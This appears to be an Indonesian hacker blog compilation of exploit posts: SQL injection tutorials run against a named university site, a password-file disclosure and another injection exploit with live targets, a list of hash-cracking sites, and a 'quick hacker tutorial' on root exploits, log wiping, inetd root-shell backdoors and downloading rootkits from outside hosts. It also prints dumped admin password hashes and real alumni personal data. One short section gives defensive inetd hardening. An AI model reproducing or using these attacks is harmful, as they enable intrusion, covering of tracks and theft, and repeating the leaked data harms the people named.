Aku Bukan Hacker

Pie Web M{a,e}sher 0.5.3 Vulnerabilities to Seeing User and Hash Password
 _______            __        ______  ____  ______  ____
|   _   |.—–..–|  |.—-.|__    |/    \|  __  ||_   |
|       ||     ||  _  ||   _||__    ||_/\_||  __  | _|  |_
|___|___||__|__||_____||__|  |______|      |______||______|
                                                             http://andr381.tk
Author  : Andr3^81
e-Mail  : andr3-81 [at] linuxmail [dot] org
Locate  : Indonesia

Software : Pie Web M{a,e}sher version 0.5.3
Vendor   : http://pie.ekkaia.org/
Download : http://pie.ekkaia.org/page/Download
——————
- Bugs:
——————

http://piewebhost/run

——————
- dork:
——————

you can find it

——————
- Exploit:
——————

http://example.com/run/user/password.map

now you can see the user and hash password

——————
- Live:
——————

http://kmlinux.fjfi.cvut.cz/~doubekj/run/user/password.map

——————
- GreTzZ :
——————

thank’s to str0ke
monci, ony, petunia, wisnu, NoGe [Mainhack Brotherhood]

BORST (BOrneo Research Security Team)
#xcode, jasakom.com, echo.or.id, all Indonesia Hackers

————————————–
Cara Sederhana sql injection MySQL v5 |
————————————–
author: Andr3^81
email: andr3-81 [at] linuxmail [dot] org

http://site.com/vuln.php?id=1′ <- error

kita coba cari nama databasenya
http://site.com/vuln.php?id=1 union all select 0 from admin
didapat nama databasenya bego

http://site.com/vuln.php?id=1 union all select 0 from information_schema.tables
belum berhasil

kita cari jumlah kolomnya
http://site.com/vuln.php?id=1 order by 9/* tidak eror
http://site.com/vuln.php?id=1 order by 10/* eror
maka diambil kesimpulan kolomnya berjumlah 9

http://site.com/vuln.php?id=1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*
tidak didapat apa2
tambahkan (-) didepan belakang (=)
http://site.com/vuln.php?id=-1 union all select 1,2,3,4,5,6,7,8,9 from information_schema.tables/*
didapat angka 3

untuk mencari nama tabelnya, angka 3 kita ganti dengan table_name
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’/*
didapat nama tabel tblArsip

untuk mencari nama2 tabel lainnya kita gunakan limit 1,1
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 1,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 2,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 3,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=’bego’ limit 4,1/*
sampe gak ada lagi tanda yang muncul di monitor

misalkan kita mendapatkan nama tabelnya adalah tblUser

sekarang kita akan mencari nama2 kolomnya

untuk mencari nama tabelnya, angka 3 kita ganti dengan column_name
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’/*
didapat nama kolomnya UserName

untuk mencari nama2 kolom lainnya kita gunakan limit 1,1
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 1,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 2,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 3,1/*
http://site.com/vuln.php?id=-1 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=’tblUser’ limit 4,1/*
didapat nama kolom UserName, UserLogin, UserPass, UserMail

setelah dapat nama kolom dan tabelnya kita masukkan

http://site.com/vuln.php?id=-1 union all select 1,2,UserLogin,4,5,6,7,8,9 from tblUser
http://site.com/vuln.php?id=-1 union all select 1,2,UserPass,4,5,6,7,8,9 from tblUser
didapat loginnya admin
didapat passnya 1234

tinggal kita cari halaman admin
misalnya kita temukan
http://site.com/admin.php
tinggal kita masukkan aja loginnya:admin
passwordnya:1234

Latihan SQL Injection

Author : Andr3^81
e-Mail : andr3-81 [at] linuxmail [dot] org
Release: 3 Nov 2008 at 16:30 WIB

Pertama kita buka situs
misal:

http://www.stmikpontianak.ac.id/

trus buka link news
http://www.stmikpontianak.ac.id/news.php?id=83
tambahkan ‘ pada akhir angka 18 sehingga seperti ini
http://www.stmikpontianak.ac.id/news.php?id=83′
jika error berarti vulner
sekarang kita coba memasukan perintah
http://www.stmikpontianak.ac.id/news.php?id=83 and 1=1
http://www.stmikpontianak.ac.id/news.php?id=83 and 1=2 <– ternyata error
kemudian kita coba ngecek kolomnya
http://www.stmikpontianak.ac.id/news.php?id=83 order by 1/* sampe
http://www.stmikpontianak.ac.id/news.php?id=83 order by 10/* <– ternyata error
Unknown column ‘10′ in ‘order clause’

sehingga bisa ditarik kesimpulan bahwa kolom hanya berjumlah 9
kemudian kita cek holenya pada kolom yang bermasalah tersebut
gunakan perintah union all select dan jangan lupa memberi tanda minus di depan angka misalnya 83 jadi seperti ini
http://www.stmikpontianak.ac.id/news.php?id=-83 union all select 1,2,3,4,5,6,7,8,9/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,3,4,5,6,7,8,9/*

3
7 Agustus 9

5
ternyata yang timbul adalah 3 dan 5 berarti yang bermasalah tersebut pada kolom 3 dan 5

kita coba perintah berikut untuk mengecek versinya
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,convert(@@version using latin1),4,5,6,7,8,9/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,unhex(hex(@@version)),4,5,6,7,8,9/*
woow ternyata versi 4

kemudian kita tebak2 kolomnya

http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,3,4,5,6,7,8,9 from news/*

http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,3,4,5,6,7,8,9 from news where id=1/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,3,4,5,6,7,8,9 from news where id=9-15/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,load_file(‘/etc/passwd’),4,5,6,7,8,9/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9/*

kita dapatkan
stmik@localhost : stmik : 4.1.20
artinya usernya     : stmik@localhost
databasenya     : stmik
versi mysqlnya     : 4.1.20

trus kita coba lagi
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9 from news/*
trus kita coba sampe dapat yang lainnya

http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9 from news where id=1/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user(),4,5,6,7,8,9 from news where id=1/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,unhex(hex(concat(id))),4,5,6,7,8,9 from news where id=1/*

http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,nim,4,password,6,7,8,9 from login/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,concat_ws(0×3a,nim,nama,gender,email,tmp_lahir,judul_skripsi),4,5,6,7,8,9 from alumni/*

kita coba terussssssssssssss pantang mundur ———–>

http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password where id=3/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password where id=9/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password where id=10/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password where id=11/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password where id=12/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password where id=13/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password where id=14/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,user,4,password,6,7,8,9 from password where id=16/*

hasilnya di bawah ini

ADMMORINA::60671c896665c3fa
ADMKETUA::565491d704013245
ADMPUKET1::565491d704013245
ADMPUKET2::565491d704013245
ADMPUKET3::565491d704013245
ADMKAJURMI::565491d704013245
ADMKAJURTI::565491d704013245
ADMWILLY::14e7c86331ddaab0

coba lagi ya….

http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,nim,4,password,6,7,8,9 from login where password=1/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,nim,4,password,6,7,8,9 from login where password=2/*
silakan lanjutkan
masih penasaran neh coba lagi ah heheheh….

http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,concat_ws(0×3a,nim,nama,gender,email,tmp_lahir,judul_skripsi),4,5,6,7,8,9 from alumni where gender=1/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,concat_ws(0×3a,nim,nama,gender,email,tmp_lahir,judul_skripsi),4,5,6,7,8,9 from alumni where gender=2/*
http://www.stmikpontianak.ac.id/news.php?id=null union all select 1,2,concat_ws(0×3a,nim,nama,gender,email,tmp_lahir,judul_skripsi),4,5,6,7,8,9 from alumni where gender=3/*

19961000608:AGUS IRVANDI:1:agus@irvandi.com:PONTIANAK:ANALISIS SISTEM INFORMASI ADMINISTRASI PENJUALAN PADA PT. RICKY PUTRA GLOBALINDO PONTIANAK
19971100290:RAHAYU SRI SULISTYAWATI:2::PURUN BESAR:Analisis dan Perancangan Sistem Informasi Pelayanan Pasien Divisi Rawat Inap Pada Rumah Sakit Umum Daerah Dr. Doedarso Pontianak
dapat deh passnya f87f8f834b237ad853fb44cccaa18952 crack md5nya ==>> sapi

Fiuh capenya…silakan lanjutkan broo…hehehe
Maaf bung admin silakan patch situs anda demi menjaga hal2 yang tak diinginkan…
Ini hanya untuk pembelajaran saja ya…

sekian dulu tutorial dari saya

greetz: #xcode, Jasakom.Com, echo.or.id all of Indonesia Hackers

Author: Andr3^81
email: andr3-81 [at] linuxmail [dot] org
release: 25/10/2008 at 5:36 PM

Kali ini saya lagi iseng membuka halaman pilwako pontianak
maklum pengen ngeliat siapa kandidat pilwako yang unggul untuk sementara waktu pada pilwako pontianak tanggal 25 Oktober 2008.
ketika saya membuka situs tersebut dengan alamat

http://www.pilwakopontianak.com
saya hanya bisa melihat tampilan ini

| Beranda | Arsip Berita | Tentang KPU | Suara Anda | Kontak | Gallery

mh…
dimana ya tempat hasil penghitungan suara sementara???
terus saya melihat2 lagi halaman di samping kanan ternyata saya menemukan beberapa akses menu seperti ini

Pilwako 2008
————
+ Undang-undang
+ Peraturan KPU
+ Keputusan KPU Kota
+ Data Pemilih
+ Data TPS
+ Data Pasangan Calon
+ Data Perolehan Suara
+ Hitung Cepat Hasil Pilwako

trus saya coba mengklik + Hitung Cepat Hasil Pilwako
saya menemukan alamat seperti ini

http://qrc.pilwakopontianak.com
http://qrc.pilwakopontianak.com/?lang=id&cid=20
Ternyata saya juga belum menemukan hasil Quick Countnya namun saya melihat tampilan yang seperti ini

| Beranda | Tentang PILKADA | Profil Kandidat | Berita Pilkada | Suara Anda | Perhitungan Cepat Hasil Pilwako

saya mengklik | Perhitungan Cepat Hasil Pilwako |

Apa yang saya dapatkan???
Ternyata saya tidak mendapatkan apa-apa dan terdapat pesan seperti ini

UserID :
Password :

Untuk sementara, tampilan web ini hanya untuk konsumsi internal penyelenggara PILWAKO
Informasi Hasil Pemungutan Suara Secara Menyeluruh Dapat Di Lihat Masyarakat Mulai Tanggal 26 Oktober 2008

saya kecewa lagi untuk kesekian kalinya…
hm….
karena rasa penasaran saya yang luar biasa, saya coba membuka source website tersebut
dengan mengklik di keyboard Alt + V + c <— View Source
mungkin dengan begitu saya bisa mendapatkan info sedikit dari source htmlnya

Seperti ini

function changeText(){
var elemT = document.getElementById(“BoxHead”);
addItem(‘/modules/bin_quickcount_ajax.php?code=0&xcode=1′,’BoxHead’);
intervalText = setInterval(flashText,limitTime);
}

function flashText(){
var elemT = document.getElementById(“BoxIsi”);
addItem(‘/modules/bin_quickcount_ajax.php?code=1′,’qc_content’);
countDown()
}

function stopText(){
clearInterval(intervalText);
addItem(‘/modules/bin_quickcount_ajax.php?code=0&xcode=0′,’BoxHead’);
}

hmmmm….
pake ajax rupanya
saya mencoba membuka halaman berikut
http://qrc.pilwakopontianak.com/modules/bin_quickcount_ajax.php?code=0
ternyata tidak ada hasilnya
mh….
saya memperhatikan yang ini

function flashText(){
var elemT = document.getElementById(“BoxIsi”);
addItem(‘/modules/bin_quickcount_ajax.php?code=1′,’qc_content’);
countDown()
}

kemudian saya mengganti dengan code=1

http://qrc.pilwakopontianak.com/modules/bin_quickcount_ajax.php?code=1

apa yang terjadi????
wow surprisee!!!
saya bisa melihat hasil Quick Count sementara dari Pilwako Pontianak
tapi itu hanya sementara saja karena
Informasi Hasil Pemungutan Suara Secara Menyeluruh Dapat Di Lihat Masyarakat Mulai Tanggal 26 Oktober 2008
artinya saya lebih dulu mendapatkan informasi yang dimasukkan ke database pilwako pontianak 2008

sekian dulu dari saya
jadikanlah artikel ini sebagai pembelajaran saja…
kepada admin maaf, saya hanya pengen tau aja, situsnya gak diapa-apain kok…hehehe

greetz…
#XCODE Pontianak
all jasakomer and echo.or.id

Author: Andr3^81 andr3-81@linuxmail.org
Release: 12 Oktober 2008

Berikut ini saya berikan link untuk mengcrack md5 password, yang kebetulan saya iseng2 nyari kata kunci md5 di search engine Google.
selamat mencoba

http://md5crack.com
http://www.milw0rm.com/cracker/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.plain-text.info/add/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://md5search.uk.to/
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ – Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://sha1search.com/

++++++++++++++++++++++++++++
Author :         boom3rang
webpage :    www.khg-crew.ws
greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er – [-=Kosova Hackers Group-=]
++++++++++++++++++++++++++++

[+] Dork:     infusions/triscoop_race_system/race_details.php?

[+] Example:         http://localhost/infusions/triscoop_race_system/race_details.php?raceid=[ exploit ]

[+] Exploit
——————————–

http://localhost/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users–

——————————–

[+] liveDEMO:

http://www.triscoop.com/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users–

Title : Tutorial Express buat calon Hacker
Author : Andr3^81

1. ***Compile File***
gcc -o file file.c

2. ***Jalanin wuftpd-god.c***
./filewuftpd-god -t IPtarget -s0

3. ***Jalanin statdx.c ***
./filestatdx -t IPtarget -d0

4. ***Jalanin 7350wu***
./7350wu -r -h IPtarget

5. ***Compile BnC : (BnC2.2.4)***
gcc -o file bnc.c
export TERM=vt100 (2x)
pico bnc.conf
./file

6. ***Root Wipe***
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -f /root/.bash_history
touch /root/.bash_history
chmod 0 /root/.bash_history
ls -laF /root/.bash_history
chmod 0 /var/log/*
———————————————————-
7. ***kalo udah masuk root***
cari user postgres atawa gdm
or ketik
a. finger gdm or finger postgres
b. passwd postgres atau passwd gdm
c. mkdir /usr/man/gdm or postgres
d. chown gdm or postgres /usr/man/gdm or postgres

kalo gak ada u bikin user atas nama gdm atawa postgres
cd /usr/sbin
./adduser -d /usr/man/gdm or postgres
ulangi ku sia langkah point 4
———————————————————-
8. ***Adduser***
cd /usr/sbin
./adduser -d /etc/
chown /etc/
passwd

* untuk mode BINARY Exec File or *gz *.rpm
***Download (Shell to Shell)
ftp shell tujuan
bin
hash
mget file

***Upload (Shell to Shell)
ftp shell tujuan
bin
hash
mput file

* untuk mode ASCII / txt , html , *.c
***Download (Shell to Shell)*** Mode Binary
ftp shell tujuan
hash
mget file
***Upload (Shell to Shell)
ftp shell tujuan
hash
mput file

9. ***IP Shell***
/sbin/ifconfig

***Copy File***
cp file /direktory-tujuan

10. ***Login Root (Term)***
adduser
upload file : term.sh/term2.sh, statd.rpm & wuftpd.rpm —> ke user
chmod +x term.sh
./term.sh
masukkin pass(buat vt-nya)
bersihin Log
exit

11. ***Cek New Term***
export TERM=pass (2x biar clear)
telnet Ip target
(kalo masuk : that’s good job !!!)
pico log.sh
chmod +x log.sh
./log.sh

12. ***Patch Term***
rpm -Uvh statd.rpm
rpm -Uvh wuftpd.rpm

13. ***Hide BG procces***
gcc -o namafile undo1.c
chmod +x namafile
./undo httpd ./eggdrop -m eggdrop.conf

14. ***Jalanin z0ne***
chmod +x z0ne
./z0ne -o hostname >> file-hostname.log &
ex : ./z0ne -o net.id >> net-id.log &

15. ***Jalanin wuscan***
compile wuscan.c
./wuscan filez0ne.log &
hasilnya : wu-scan.log
cat wu-scan.log (buat baca hasilnya)

16. ***Re-Hack (login user masih ada)***
upload mount.c
compile mount.c
chmod +x file-mount
./file-mount
su root
term ulang

17. ***Wipe Login User***
(ngejalaninnya pake login Root)
upload wipe ke dir-user
chmod +x wipe
./wipe u username
./wipe l username
./wipe w username

18. ***Rlogin***
rlogin -l usernukusiadijiuen ip

***Buka Port Telnet Baru***
echo telnet 11210/tcp Telnet telnet 11210/udp Telnet >> /etc/services
echo 11210 stream tcp nowait root /usr/sbin/tcpd in.telnetd >> /etc/inetd.conf
killall -HUP inetd
atau :
echo “ntp 16032908/tcp” >> /etc/services
echo “ntp stream tcp nowait root /bin/sh sh -i” >> /etc/inetd.conf
echo “16030 stream tcp nowait root /usr/sbin/tcpd in.telnetd” >> /etc/inetd.conf
killall -HUP inetd

19. ***Jalanin Tembak.c***
./fake bash ./tembak zipey.net 53 (Pake Hidder tanpa Login Root)
./tembak ipaddress 53 atau ./tembak zipey.com 53
./tembak zipey.com 53 –>> artinya nembak zipey.com lewat port 53
(ditembak port 53 nya pasti mati)
./fake proses_asli proses_paslu
./fake httpd ./teso -h 202.202.202.202
./fake -bash ./bnc bnc.conf
./fake pico ./eggdrop -m FroGStoNe
========================================
********ping flood*********
ping -qfl 65510 -s 1000 (IP)
stop : ctrl C
========================================
cat /etc/passwd/
==============================================================================
*********buka FTP**********
echo ftp 11210/tcp Ftp ftp 11210/udp Ftp >> /etc/services
echo 11210 stream tcp nowait root /usr/sbin/tcpd in.ftpd >> /etc/inetd.conf
killall -HUP inetd
==============================================================================

#################################################################################################
# Inetd, atau disebut sebagai ’super server’ akan meload program network sesuai dengan #
# permintaan dari network. File ‘Inetd.conf’ akan memberitahu inetd untuk listen pada port #
# yang telah ditentukan dan server apa yang akan dijalankan pada tiap port-port yang ada. #
# Hal ini pertama yang harus diperhatikan setelah kita meletakkan server dalam jaringan servis #
# apa yang harus kita sediakan dan servis apa yg dihilangkan. #
# Servis yg tidak diperlukan dianjurkan untuk ditutup dan diuninstall untuk lebih mengurangi #
# kekawatiran serangan pada server. #
# Posted by sisHACK crew | www.sisHACK.org | Bahan acuan Linux Redhat Server ( Han Lin ) #
#################################################################################################

Servis yang tidak diperlukan dapat ditiadakan dengan meletakkan tanda ‘#’ awal baris dari servis
yang tidak diperlukan, setelah itu kita dapat merestart ‘/etc/inetd.conf’ dengan mengirim signal
SIGHUP ke proses inetd.

Ok, kita masuk ke langkah-langkah sebenarnya :
1. ubah permision ‘/etc/inetd.conf’ ke 600
[root@sishack.org /]# chmod 600 /etc/inetd.conf

2. Periksa keterangan pemilik file ‘/etc/inetd.conf’, pastikan bahwa pemilik file tersebut adalah
root.
[root@sishack.org /]# stat /etc/inetd.conf

3. Edit file ‘/etc/inetd.conf’ dan tiadakan servis seperti FTP, telnet, shell, login, exec, talk
ntalk, imap, pop-2, pop-3, finger, auth, etc kecuali anda mempunyai rencana untuk menggunakan
servis tersebut.
Setelah selesai mengedit file ‘/etc/inetd.conf’ maka jangan lupa untuk mengirim signal SIGHUP
ke proses inetd
[root@sishack.org /]# killall -HUP inetd

4. Setelah mengedit file ‘/etc.inetd.conf’ maka langkah terakhir yang mungkin berguna untuk
dilakukan adalah mengeset atribut ‘immutable’ dengan menggunakan perintah :
[root@sishack.org /]# chattr +i /etc/inetd.conf
hal ini akan mencegah perubahan baik sengaja maupun tidak sengaja terhadap file ‘/etc/inetd.conf
untuk menghilangkan atribut ‘immutable’ menggunakan perintah :
[root@sishack.org /]# chattr -i /etc/inetd.conf

: TRIK BIKIN PSYBNC :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir …. ; cd …. ;
wget http://phaty.org/psyBNC2.2.1-linux-i86-static.tar.gz ;
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make ; mv psybnc “bash ” ; rm psybnc.conf ;
wget http://phaty.org/Psybnc.txt ; mv Psybnc.txt psybnc.txt ; mv psybnc.txt ” ” ; pwd ; PATH=$PATH:/var/tmp/…./.log/ ; “bash ” ” “
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find |grep psybnc
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir ” ” ; cd ” ” ;
wget http://phaty.org/psyBNC2.2.1-linux-i86-static.tar.gz ;
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make ; mv psybnc “httpd ” ; rm psybnc.conf ;
wget http://www.geocities.com/rush_cassidy/psybnc.txt ; mv psybnc.txt ” ” ; pwd ;
PATH=$PATH:/var/tmp/” “/.log/ ; “httpd ” ” “
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find | grep psybnc
=================================================================================================
: TRIK MENGHAPUS LOG :
=================================================================================================
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir ” ” ; cd ” “
1. wget www.norifumiya.org/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd los -g wheel -s /bin/bash -d /home/.logs
12. echo “split::0:0::/.split:/bin/bash” >> /etc/passwd
passwd -d logs
Changing password for user logs
Removing password for user logs
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14. last |grep logs
15. su geni
16. wget http//phaty.org/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/phaty
19. wget utay-doyan.cc/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup koped123 7788
23. /usr/sbin/userdel -r phaty
24. cd /var/tmp/” ” index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “Bedjoe Oemar Said Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
=================================================================================================
BACKDOOR
=================================================================================================
wget http://xvak-1.150m.com/tool/tk8.tgz
wget http://xvak-1.150m.com/tool/bk2.tar.gz
wget utay-doyan.cc/shv4.tar.gz
wget www.radikal.org/backdoor.tar.gz
=================================================================================================
nmap -sS -p 80 -O -v
nmap -sS -F -o transmeta.log -v -O www.transmeta.com//24
=================================================================================================
COMMAND ADDUSER DI FREEBSD
=================================================================================================
1. pw useradd -g whell -d /home/bedjo -s /usr/local/bin/tcsh, 2. passwd bedjo
bisa juga dengan : 1. pw useradd bedjo, untuk mengganti user dan password : 1. pw usermod erica -l bedjo, 2. passwd bedjo
=================================================================================================
BIKIN BACKDOOR
=================================================================================================
echo “bedjo 1979/tcp” >> /etc/services
echo “dial stream tcp nowait root /bin/sh sh -i” >> /etc/inetd.conf kill -HUP 135
telnet dengan port “1979″
=================================================================================================
http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
